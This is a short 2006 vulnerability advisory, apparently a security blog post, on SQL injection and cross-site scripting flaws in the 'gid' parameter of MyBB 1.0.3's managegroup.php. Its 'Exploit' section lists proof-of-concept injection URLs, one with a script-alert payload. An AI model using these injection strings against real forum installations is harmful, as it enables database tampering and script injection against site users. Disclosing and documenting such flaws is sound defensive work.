——————-Summary—————-
Software: MyBB
Sowtware’s Web Site: http://www.mybboard.com
Versions: 1.0.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: mediume high
—————–Description—————
There is some security bug in MyBB 1.0.3 software (latest version fully patched) file managegroup.php lines 313 that allows attacker performe an SQLINJECTION and XSS attack. bug is in result of poor checking non integer values for “gid� input variable.
Conditions: user should have enough permissions (group leader)
/////////////////////////
Lines of buggy code are:
75 sql
98 sql
125 sql
141 sql
160 sql
177 xss
/////////////////////////
————–Exploit———————-
mybb/managegroup.php?gid=8&action=do_joinrequests&request[sql]=accept
mybb/managegroup.php?gid=8′sql&action=joinrequests
mybb/managegroup.php?gid=8′sql&action=do_manageusers&removeuser[]=’sql
mybb/managegroup.php?gid=8′sql{if user group is publically joinabe with moderated by leader}
mybb/managegroup.php?gid=8′sql{if user group is publically joinabe without moderating by leader}
mybb/managegroup.php?gid=8′//<script>alert(1)</script>{if user group is publically joinabe without moderating by leader also requests are as more as can not show on one page}
————–Solution———————
upgrade to vendors provided patch
————–Credit———————–
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
www.myimei.com
security.myimei.com
One Response to “MyBB1.0.3~managegroup.php~Multiple SqlInjection & XSS”
Something to say?
You must be logged in to post a comment.
http://www.frsirt.com/english/advisories/2006/0619
http://www.securityfocus.com/bid/16689
http://www.securityfocus.com/bid/16692
Left by imei on February 24th, 2006